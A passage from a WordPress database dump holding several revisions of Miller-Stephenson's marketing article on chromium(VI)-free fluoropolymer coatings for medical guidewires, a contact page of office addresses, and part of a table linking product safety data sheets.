<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 14:52:35', '2017-02-17 14:52:35', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3653, 3, '2017-02-17 15:06:01', '2017-02-17 15:06:01', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection of the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection. Our medical coatings have never been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 15:06:01', '2017-02-17 15:06:01', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3654, 3, '2017-02-17 15:20:30', '2017-02-17 15:20:30', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guidewires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity and biocompatible nature found exclusively with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection of the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately, Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured, all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection. Our medical coatings have never been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, have developed state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 15:20:30', '2017-02-17 15:20:30', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3655, 2, '2017-02-17 16:27:50', '2017-02-17 16:27:50', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>Global Offices</h3>\r\n<strong>Corporate Office</strong>\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n800.442.3424\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\n<strong>Illinois</strong>\r\n6348 Oakton St.\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468\r\ne-mail: ilsales@mschem.com\r\n\r\n<strong>California</strong>\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\n<strong>Canada</strong>\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@mschem.com\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2017-02-17 16:27:50', '2017-02-17 16:27:50', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3656, 2, '2017-02-17 16:28:32', '2017-02-17 16:28:32', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/472S-16.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy48.pdf">HELOXY 48</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381HM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/257.pdf">MS-257</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/136W.pdf">MS-136W</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/477C.pdf">MS-477C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL246.pdf">GPL 246</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy61.pdf">HELOXY 61</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/262.pdf">MS-262</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143AX.pdf">MS-143AX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/G0831B.pdf">G0831B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL255.pdf">GPL 255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy62.pdf">HELOXY 62</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/282.pdf">MS-282</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143E-16.pdf">MS-143E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0110A.pdf">Y0110A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/157FS.pdf">157FS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy67.pdf">HELOXY 67</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HC</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/532.pdf">MS-532</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E1.pdf">MS-143E-1</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/487G-16.pdf">MS-487G</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL20X.pdf">GPL 20X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy68.pdf">HELOXY 68</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HCM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/539.pdf">MS-539</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E2.pdf">MS-143E-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL21X.pdf">GPL 21X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy71.pdf">HELOXY 71</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/552.pdf">MS-552</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E5.pdf">MS-143E-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL22X.pdf">GPL 22X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy107.pdf">HELOXY 107</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/557.pdf">MS-557</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E10.pdf">MS-143E-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL226FG227FG.pdf">GPL 226FG, 227FG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy116.pdf">HELOXY 116</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/562.pdf">MS-562</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143EBLUE.pdf">MS-143E BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/240.pdf">240 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy505.pdf">HELOXY 505</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/582.pdf">MS-582</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143ERED.pdf">MS-143E RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/250-Series.pdf">250 Series</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BisphenolA157.pdf">BISPHENOL A-157</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250SP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/702.pdf">MS-702</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143H-16.pdf">MS-143H</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/280-15.pdf">280 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/164.pdf">EPON RESIN 164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/722.pdf">MS-722</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H1.pdf">MS-143H-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/283.pdf">283 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/SU8.pdf">EPON RESIN SU 8</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255M</a></td>\r\n<td style="text-align: center;"><a 